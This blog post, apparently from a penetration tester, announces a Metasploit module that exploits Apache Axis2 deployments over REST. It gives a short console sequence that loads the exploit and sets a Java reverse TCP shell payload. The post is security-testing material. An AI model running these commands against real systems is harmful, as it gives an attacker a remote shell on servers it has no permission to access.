Axis2 Deployer via REST

Update 12/06: Many kudos to Egypt for helping with exploit dev!

Last weekend at OWASP BASC 2010, I created another version of the Axis2 Deployer exploit which uses REST instead of SOAP. This is important because pentesters may need to exploit Axis2 via REST, since SOAP may be disabled in certain environments. This module will not work against SAP BusinessObjects since the dswsbobje.war module has the REST interface disabled by default. I have tested the module against Axis2 1.5.2.

The REST version of Axis2 Deployer Exploit module can be found here.

In essence this module adds more flexibility for everyone that is a pentesting an environment with Axis2.

Example usage:

use exploit/multi/http/axis2_deployer_rest
set PATH /axis2
set payload java/shell/reverse_tcp
set target 0
set LPORT 13337
exploit -j



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: